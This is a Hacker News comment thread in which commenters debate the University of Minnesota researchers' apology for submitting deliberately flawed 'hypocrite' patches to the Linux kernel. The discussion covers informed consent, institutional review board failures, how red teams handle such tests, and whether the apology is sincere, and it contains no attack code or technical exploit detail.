No, they didn't have to. That seems like quite an over-reaction by Mr. Kroah-Hartman.


We are a research group whose members devote their careers to improving the Linux kernel. We have been working on finding and patching vulnerabilities in Linux for the past five years. The past observations with the patching process had motivated us to also study and address issues with the patching process itself.

Can someone please explain why someone who is working with others on a common goal for years suddenly conducts a breaching experiment? What were they thinking?

(Also, there must be experience within Linux about malicious commits, three-letter agencies from all over the world must have tried before. Why not try archeology?)


I think the apology comes across as insincere because they don't just stop with apologizing but go on attempting to justify their actions and already look beyond the issue at hand.

First, you just apologize for what you did, and that's that. The ball is in the other side's court.

I haven't seen the message from the Linux Foundation to the university. Assuming that's private and I didn't miss it somewhere?


This was not an apology. What’s worse is that it is clear that they still fundamentally do not understand that what they did was wrong.


Supply chain attacks are the security buzzthreat of the day, at least since SolarWinds. Mucking about with the Linux kernel would be a really juicy target for nation-state actors. If you wanted to study this risk, how would you go about doing it?

I haven't done kernel work since BSD4.3 so my opinion isn't particularly interesting. With that said, I would agree that the researchers were naive and their approach has caused collateral damage. However, I'd also argue that the (apparent) topic of research is quite valid. There are a lot of extremely well funded adversaries who are quite talented at obfuscation. "Be careful out there."


Agreed, and as such the Linux community should counter-signal to gain deterrence. If you do this kind of thing and get caught, a simple apology is not enough: you get banned. It's a kind of game-theoretic approach.


The question always is: could you have learned the same thing with less "invasive" methods? And I think there's a good argument here that that's the case. I.e., the researchers first looked at bugs in the kernel and their history, finding that such scenarios happened by accident. They could likely have gotten bugs past reviewers whom they had told that they were trying something like this. There are lots of options, so going for the most extreme option to "find" something that's not exactly a new or widely disputed idea is quite unnecessary.


> If you wanted to study this risk, how would you go about doing it?

The main factor in doing this ethically is obtaining consent from your research subjects. I believe that some Red Teams test precisely these sorts of security mechanisms in commercial software projects, and there are solid comments elsewhere in this thread discussing the procedures they use.


> we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

For you security people out there, how do red teams handle this issue?


A red teamer answered above: https://news.ycombinator.com/item?id=26929797

Basically, warn them that you’re going to do it at some point in the future. Then do it in a time frame of maybe 6 months or so, from another identity. Maybe get some of the higher-ups to sign off (say Linus or Greg in this case) beforehand. At the very least, engage with the community...


That might be a hypocrite open letter


Cynical take: is this mail genuine/sincere, or is it also part of some kind of new experiment? How can we trust them not to be running some kind of new trolling?


Greg K-H replied:

> Thank you for your response.

> As you know, the Linux Foundation and the Linux Foundation's Technical Advisory Board submitted a letter on Friday to your University outlining the specific actions which need to happen in order for your group, and your University, to be able to work to regain the trust of the Linux kernel community.

> Until those actions are taken, we do not have anything further to discuss about this issue.

Was this letter publicly released?


It's easier to ask forgiveness than to get permission


Let's have a bet:

The commission / board that approved this experiment will never suffer any consequences.

And IMO they are just as guilty. They didn't do their job well.


Unpopular opinion: People here seem to be overreacting when Linus Torvalds thinks this is not a big deal.

https://itwire.com/open-source/torvalds-says-submitting-know...


Linus doesn't say it isn't a big deal; he says the technical impact of the incident is not high. The reason this is a big deal is the violation of ethics and the breach of trust, not the technical damage to the source code, all of which Linus acknowledges.


I asked Kangjie Lu to explain the original complaint. Here is his reply from Wednesday:

—-

Thanks for sharing.

The statements in the link are wrong. I will make some clarifications.

1. We have never intentionally introduced any bugs in Linux.

2. The project that investigated the issues with the OSS patching process was done in November 2020. We did get an IRB letter for the research. The purpose of the research is to improve the security of the OSS patching process.

3. One of my students is working on a different project which has nothing to do with the project mentioned in 2. The student aims to fix problems in Linux instead of introducing problems.

If you are interested in the project mentioned in 2, please find more details here: https://www-users.cs.umn.edu/~kjlu/papers/clarifications-hc....

I hope these clarify the misunderstandings.

Kangjie Lu
Assistant Professor
Department of Computer Science and Engineering
University of Minnesota
https://www-users.cs.umn.edu/~kjlu

—-


The only good thing about this whole ordeal is that patch scrutiny and security awareness will improve for some time; but I despise the experiment and anyway believe that it will not lead to any organic improvement of the review process.


Hmm, I wonder why in the section about rebuilding relationships, the Linux Foundation appears before the Linux community? LF doesn't have much to do with Linux development AFAIK.


This was clearly human-subjects research. It needed to go through IRB review and obtain the consent of the participants. Organizational failures allowed this to happen and need to be addressed.


Definitely would not hire these three guys to do a vulnerability assessment of ANY network. This kind of work is predicated on:

- consent by selected few

- buy-in on all major parties

- documentation trail, ongoing

I’m sure there’s more but ...


Admission of wrongdoing won’t get you uncancelled in 2021.


Another “I’m sorry you feel that way” letter.


> any harm

> it was hurtful

A rather vague and strange way to put it. When did the Linux community adopt the language of safetyism?


So now it gets interesting, when the Linux maintainers themselves cannot separate good from bad patches.

It's a 190 vs 3 bad, against ~50 vs 143 bad.

Let's hope the maintainers can correctly identify the good ones, now with the given hints (August 2020 only). Or whether they keep staying in witch-hunt mode. Word against word. Some of the latest patches do look wrong, but I'm not an expert. Analysis will need a few weeks.


Whether it is appropriate or not, the Linux kernel is used in many mission critical and essential services. One could very convincingly argue that the open source Linux kernel is a vital part of mission critical infrastructure found all around the world. An apology, likely written under duress, for an inappropriate research method or for consuming the time of maintainers (either volunteer or paid) does not address the most egregious transgression:

One does not conduct security research or experimentation on mission critical infrastructure without the informed consent of the persons maintaining or responsible for said infrastructure.

The stark difference between white (or even gray) hat and black hat security operations is whether those operations are done with the informed consent of the owners of the system(s) being manipulated. To knowingly and deliberately attempt to manipulate critical infrastructure without the informed consent of the persons responsible for that infrastructure is, in my eyes, clearly unethical black hat hacking. It does not matter how many resources were expended, nor does it matter if there was no personal injury or destruction of property. A quiet, relatively uneventful outcome of a black hat operation is nothing more than a dose of good luck.

There are many other circumstances in which this sort of clandestine operation would be obviously unacceptable. Consider if a researcher wished to surreptitiously tamper with vaccine supply chains, automotive or aircraft supply chains, fuel distribution supply chains, chemical manufacturing supply chains, etc. Even if the researcher claimed to have the best of intentions, and had a written plan to carefully back-out or otherwise reverse (or prevent from going to production) the intentionally flawed manipulations or modifications of critical supply chain components, I think very few people would consider the research ethical. There are an enormous number of issues, defects, and mishaps that occur even when a group of people tries their best to implement and maintain critical systems. When a clandestine operator decides to interfere, using whatever justification, then reliability of the system can be expected to suffer.

I do not believe the written apology addresses the underlying problem, which seems to be that the University of Minnesota does not exercise sufficient governance over the researchers in its employ.


This is the most reasonable response in this chain. The number of unintended consequences this "research" could have caused is not quantifiable. This entire episode is shocking, disgusting, and should not be forgiven easily. Actions speak louder than words; this is especially true of apologies. Their words are empty and their actions are nonexistent.


To be fair, you wouldn’t expect these individual researchers to address the governance question. That should come from the University or the department in question.


Indeed, I agree -- the University of Minnesota should shoulder a degree of responsibility. That is even more so the case given that the researchers do not seem to understand (or clearly acknowledge that they understand) the importance of informed consent in both research and security operations, how much reputational damage (for them and the university) can result from unethical research, and the potential for actual harm to occur when research or security operations are conducted in an exclusively clandestine manner.


> the University of Minnesota should shoulder a degree of responsibility.

In fact the argument could be made that there is an ethical duty for every software project, and possibly every individual, to economically boycott the University of Minnesota until they put in place independently-verified changes to their IRB process such that research like this will not be approved again.

If the only "cost" to the university is that one of its researchers has to write a two-faced apology message, then there is nothing stopping future abuses of non-consenting humans. Moreover, with no real punishment meted out, it creates an incentive for other universities to similarly weaken their IRB process to the same level so that they can approve more research projects and remain competitive.


The university should shoulder a huge degree of responsibility. They hired these "researchers". The apology should be coming from those who sponsored and funded the effort. Who cares about any "apology" these "researchers" cobbled together?


This feels like a genuine apology that has been edited to hell by superiors to CYA.


to the folks picking this apart word-by-word: all evidence suggests that two of the signatories are natives of china, and the third of india. it is reasonable to credit them with not being native english speakers.


You can write a good apology even in simple English. And since the researchers clearly have the ability to write papers in major English conferences, this doesn’t seem to be the problem. It’s just that the apology doesn't do enough to acknowledge the harm they have caused and what they are going to do in the future to prevent such harm.


> It’s just that the apology doesn't do enough to acknowledge the harm they have caused and what they are going to do in the future to prevent such harm.

and that's fair! (also completely unrelated to what i said.)

and has nothing to do with the individual word choices that they're being picked apart on, which would be subtle even to native english speakers.

> And since the researchers clearly have the ability to write papers in major English conferences this doesn’t seem to be a problem.

you're reading different conference papers than i, native-level english is not generally a requirement.


there's no way this didn't go through multiple layers of review


sure there is. this is less important to the university than it is to HN. probably it's been mentioned to the dean of engineering, but i doubt anyone above that knows or would care without half an hour of explanation.

and even if the letter was heavily reviewed, the moral thing to do is to give a professor and two grad students leeway in interpretation of their english. (i'll grant that their past actions used up their leeway in interpretation, but those aren't the same.)

that doesn't mean it can't be a bad apology, it doesn't mean you have to accept or like it. just, come on, find more substantial issues than their adjectival choices.


They should be expelled. Their department chair should be sending the apology.


This "apology" sounds like social engineering to me. Like they only sent it so they can continue their "research" about how easily they can manipulate the humans reviewing patches for the Linux kernel.


I wonder if the real reason for the patches was to help out certain government agencies with known vulnerabilities. Wild speculation, etc.

Whatever the reasons, this open letter is a joke.


Any apology that doesn't involve retracting the paper is hollow.


Looking forward to the follow-up paper, "Open Source Insecurity: Concealing Vulnerabilities via Hypocrite Apologies"


The apology reads as sincere to me, even if it could be better; but this, for me, is why it might be very difficult for the Linux community to recover trust in these guys.

This, and the previous mail, which I found pretty insulting too and seemingly written in bad faith; but I'd give the benefit of the doubt there, since one can react badly to a difficult situation.


I am skeptical of whether they are sincere, because they did not retract the IEEE paper.


'yo, my bad'


Leave them banned.


Will they review incoming patches more carefully going forward?


I'll take the down-vote as a no... To tell you the truth, I expected more from Linux (self-preservation).


Do not entertain these people's dog and pony show. Do not give them attention. The only way for UMN to be redeemed is for them to expel all the researchers responsible and to fire all the staff tangentially responsible for letting it happen.


Really? I unequivocally think it was unethical research, and thus a mistake.

But what’s the appropriate proportional response?

I honestly have a hard time thinking firing a bunch of people over this would be a good outcome for anyone.

What’s the end goal? I feel like already there’s been enough action to deter this kind of sneaky research in the future.

But at some point you’re just going to scare away the ethical researchers too.


Non-academics get fired for doing unethical things entirely unrelated to their jobs all the time, just to avoid bad publicity.

Determining how to conduct your research ethically is a core part of being a researcher. Basic research into pen testing and security research would have revealed how unethical this study was.

I see firing as completely justifiable, given that this was a failure in a core part of their job that not only caused a public-relations mess but has directly and negatively affected other members of the research institution, because they have been banned from kernel contribution.

What further incompetence do you think is required to justify firing this academic?


> Non-academics get fired for doing unethical things entirely unrelated to their jobs all the time, just to avoid bad publicity.

Yes, only if it's unrelated to their jobs. People get hired, not fired, to do unethical research in industry labs. Ethics is breached all the time in industry - rarely even considered. Google tried to make amends, but decided caring too much about ethics was a roadblock to their goals. Tesla markets their "FSD" at the risk of other drivers in the road. The only difference here is that companies have a bigger, better legal and PR team. Comparing the moral compass between academia and industry is absolutely ridiculous.


I wasn't comparing the morality of academia and industry; I was making an argument about what is considered reasonable grounds for calling for someone's firing.

If you are trying to argue that publicly funded research institutions don't think ethics are a core part of research, that seems like something that needs to be addressed.


I still do not get your initial point. You argue that firing would be justifiable in industry, i.e. for non-academics, yet we don't hear of Google or Facebook [1] scientists getting fired for controversially unethical experiments with poor publicity. The research they did was what they were funded by the government to do. So no, your standard for employment doesn't exist anywhere, industry or academia.

And to be more precise, ethics IS a core part of research. There's an entire subfield dedicated to it in academic labs. Graduate research is very specialized, and researchers do not have the intuition for a difficult topic outside of their expertise. Then there are IRBs, who are most qualified, and yet we see it remains a problem for computing ethics because it's a completely different environment.

We can continue to blame this lab, fine. I agree, huge ethical blunder. But don't forget that this passed IRB, a responsibility of the university, and several phases of anonymous peer review for a major security conference. The security conference that most definitely has reviewers from industry. Was there a lapse of judgement on ALL the scientists and engineers, all with immense experience in their respective fields, who touched this paper and participated through the entire process? Do you seriously believe that? Should they all be fired? Is it really hard to believe that computing ethics is actually not as clear, communicated, and well understood to MANY? There are so many caveats, and not many policies of conduct exist for the breadth of situations.

[1] https://www.theatlantic.com/technology/archive/2014/06/every...


[flagged]


But you have a choice to interact with the community or not. The difference is that the “hypocrite commit” researchers did not give such a choice to community members, and as of today there is overwhelming indication that these researchers violated basic and fundamental principles of ethical scientific research.


But if I choose to interact with the community, does my choice to present myself justify any and all abusive actions they may volley at me? Of course not.

The point would ordinarily be a good one, but I think you've misused it.

The Linux kernel community, by your logic, chose to interact with and be open to patches which were not properly vetted.

This framing seems secondary to a seemingly more important point, which is, nobody is fucking perfect.

In LKML or in UMinn. The light now shines on UMinn, but to me, the feigned horror of LKML at UMinn's transgressions, and the lack of commensurate outrage at the many abusive, toxic and hostile transgressions of the LKML community, presupposes a terrifying "normalization" of abusive behavior within the LKML community.

By such a notion, it's safer to interact with the UMinn transgressors than it is with LKML, who here fail to even once question their own guilt or introspect upon their own violations of trust and ethics, but heartily condemn the egregious breaches of trust of others.

I'd rather hang with the contrite, or at least hangdog, scallywag than with the quick-tongued accusers blind to their own abuses. I'd feel safer there anyhow.


Context about who performs which actions is important. You seem to equate the research actions of university "professionals" with the actions of a volunteer community, which is false to a large degree, like comparing apples to oranges. Additionally, consent to being deceived is a critical factor. No one in the Linux community promises you they will be nice[0], and Linus has stepped aside due to his past behavior[1]. To me the main point is who initiates the actions, i.e. did you willfully perform some action, or were you manipulated into performing it?

[0] https://www.kernel.org/doc/html/v4.10/process/code-of-confli...

[1] https://www.newyorker.com/science/elements/after-years-of-ab...


So it's bad for the researchers to deliberately deceive the community because a rule says patches must be made in good faith, but it's not bad for the community to be abusive because there's no rule that says it shouldn't?

So the community can be abusive, but no one may abuse the community?

If so, I think that sounds like the basis for bullying culture which perhaps unsurprisingly is what is observed.

I think it's naive for them to assume that all submissions are done in good faith, just as it's naive for participants to assume that all interactions will be nice. It's not the community's fault they were deceived nor is it the participants fault they were abused.

My point is that there is an equality: personal responsibility, ethics and integrity should apply to everyone, not just to some labeled group.

What it sounds to me like you're saying is: it's the researchers' fault that they deceived us, and we have a right to be outraged, but it's not our fault that we're abusive to participants, and they have no right to be surprised at that. Am I hearing you wrong?

My point, I think, is to draw attention to the apparently unequal application of these principles of ethics, responsibility and integrity. Additionally, I'm a little worried that your reluctance to compare the different groups is an attempt to conceal, and justify, a continued unequal application of responsibility, ethics and integrity.

That sounds pretty harsh towards you, and so I doubt that's actually what you're saying, because I don't think you're someone who lacks moral character like that. I think probably you and I are just misunderstanding each other. Perhaps.

For instance, I don't think either of us believes that bad behavior on either side, whether the deception of the researchers or the abusiveness of the community, is okay.

I suppose what I'm trying to do is contrast the reactions of either side to those things and expose what I see as an unfairness, a double standard, an unequal application. Hope that helps you understand what I'm saying. Anyway, have a good day.


It is not just bad researcher behavior, and not just unprofessional; it is unacceptable in the scientific community. This is a fact, and this is where most of the outrage is coming from. Yet at the same time, similar unethical behavior is legal to a degree[0] in a business organization.

No one is arguing that any online community is perfect; no organization is perfect. But an organization's imperfections are not, to a large degree, a justification for unethical behavior toward that imperfect organization. There are rare cases where it is justified, but this is not one of them, at all whatsoever.

> I think it's naive for them to assume that all submissions are done in good faith.

This is false; there have been numerous attempts to submit backdoors to the Linux kernel, and most in the community are aware that such attempts will never stop. This is also why some people criticize this study as just another garbage scientific paper.

What is unacceptable is submitting commits in bad faith, in the name of science, without informed consent.

What is also unacceptable, in the name of science or otherwise, is ATTEMPTING unauthorized penetration testing; that is illegal.

[0] https://www.theatlantic.com/technology/archive/2014/06/every...


Thanks for replying. I'll try to make sense of what you're saying and maybe reply to you later. Have a good day :)


I guess you think that it's okay for the community to be bad in some way, but it's not okay for researchers, because scientific ethics should be held to a higher standard than community ethics.

It's an interesting perspective. I guess it comes from the idea that communities are sort of unstructured, so it's not as important that they hold ethical standards as high as science's, because science should be more objective and people need to be able to rely on it and trust it. Someone could adopt this perspective, which seems to excuse the community's bad behavior while condemning the researchers' behavior, just to get out of any accountability in this particular case, but I'm assuming that you genuinely feel this way and held this view from before this particular incident.

I simply disagree with this view, I think everyone should behave well or at least held the same standards.

It also seems that you're (or you were when you commented) very angry and hurt by the actions of the researchers, so I guess that you're probably involved in the Linux community in some way and felt betrayed by this action, or had some similar experience with scientific people in the past. I wonder how much of the community's outrage is a result of the fact that they were successfully deceived; if they had caught these patches and prevented them from being merged, their reaction might have been entirely different even if the researchers' behavior were the same. But I suspect there would still be outrage, because probably a lot of people share your view to some extent that researchers' behavior should be held to a higher standard than their own.

It just seems to me that you're not really open to hearing my point of view on this, and that's got nothing to do with the merits of my view; it's just where you're at. Because it seems like you're not able to hear my view or engage with it, I just didn't really feel there was a point in continuing the discussion. Have a good one.


Does the response of the Linux community seem like the response of some corporations when security vulnerabilities are disclosed?

In each case, a vulnerability was disclosed. With Linux being used everywhere, you can be sure intelligence services and the like are likely sending in bad patches. If the Linux kernel's security relies on patchers having only good intentions, and it doesn't have other means of catching this stuff, we are screwed.


However, when a vulnerability is found, you would expect that the path by which that vulnerability was introduced would be shut off, right? In this case, what they’ve done is to revert all patches from this group, pending further review, just in case something else slipped through.

They’re not sweeping issues under the carpet. They are actively addressing those issues.


Everyone knows that happens. The issue is that these are presumably university funded researchers who intentionally tried to introduce vulnerabilities into the Linux kernel without working with the maintainers. It is fine to perform experiments like this, with permission. I think people are upset because there is a moral, ethical and social obligation expected from academia to not intentionally do shit like this.

They then published a paper and thought that this was acceptable behavior from a research/ethical standpoint.


> I think people are upset because there is a moral, ethical and social obligation expected from academia to not intentionally do shit like this.

OSS security should not rely on ethics and trust. The default assumption should be that malicious actors are using every dirty tactic they can to get their changes accepted, and that someone@something.edu is no more trustworthy than internal.security.agency@china.gov.cn.

Feels like the OSS community got caught with their pants down and is now overreacting.


> the response of some corporations when security vulnerabilities are disclosed

There's a big ethical difference between trying to exploit a piece of commercially produced software, and trying to exploit the time and actions of humans who are producing software which is given away for free.


Also, this wasn’t a vulnerability found in existing code that was disclosed. This was an attempt to introduce several of them in the form of innocent looking commits.

I don’t think the free vs commercial aspect is the main issue here; lots of kernel devs are paid for their work after all...


> Also, this wasn’t a vulnerability found in existing code that was disclosed.

You're right that the OP's analogy breaks down if the researchers were unsuccessful in getting their malicious patches accepted, because then there is arguably no vulnerability to report, and OP said "when security vulnerabilities are disclosed".

Steelmanning that analogy, though, what the researchers were doing was "probing for possible vulnerabilities", which some vendors also complain about, especially if the target is an online service rather than software running locally on the researcher's machine.

In that case, the main flaw in the analogy is still the difference between exploiting software and exploiting humans, so I probably should have focused on that. Nevertheless, there is a small ethical difference in some circumstances between software that is bought and software which is freely downloadable (regardless of the licences involved), since if you paid for something which is defective then you might deserve a refund.


No, not really. For starters, notice how (some) corporations threaten legal action when evidence of a bug is disclosed? And how, here, there was simply a public ban on account of no longer being a good faith participant?


"To err is human, to forgive divine."

So much incredulity and negativity in the comments here. The indignation is totally counter productive.

The apology is fine, folks. Just accept it and move on.


Wouldn't it be better if the kernel had a governance committee and such so that innocent mistakes like this could be smoothed over and the personalities over-reacting on the basis of nothing but years of expertise gained at efforts that benefit the public at large could be dismissed because of their personality problems?

Maybe we can find or make up something unrelated but unsavory about these characters objecting to those pissing in the font of Linux... That's the normal way these things are handled now, right?

(scorching sarcasm intended)



